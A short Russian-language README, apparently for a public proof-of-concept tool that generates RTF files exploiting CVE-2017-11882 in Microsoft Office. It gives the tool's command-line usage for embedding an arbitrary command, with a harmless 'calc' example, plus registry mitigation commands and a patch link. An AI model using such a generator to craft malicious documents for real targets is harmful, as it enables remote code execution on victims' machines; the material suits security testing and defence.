
CVE-2017-11882 Генератор файлов PoC
Уязвимость удаленного выполнения кода существует в программном обеспечении Microsoft Office, когда оно неправильно обрабатывает объекты в памяти. Злоумышленник, успешно воспользовавшийся этой уязвимостью, может выполнить произвольный код в контексте текущего пользователя.
Это переработанная PoC (Proof of Concept) на основе оригинальной, созданной Embedi, для генерации одного .rtf файла со встроенным выполнением удаленной команды.
python 2017-11882_Generator.py -x команда_для_выполнения -o имя_выходного_файла
Пример: python 2017-11882_Generator.py -x "cmd /c calc" -o test.rtf
Для 32-битного пакета Microsoft Office в x86 OS: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Для 32-битного пакета Microsoft Office в x64 OS: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Microsoft выпустила патч https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882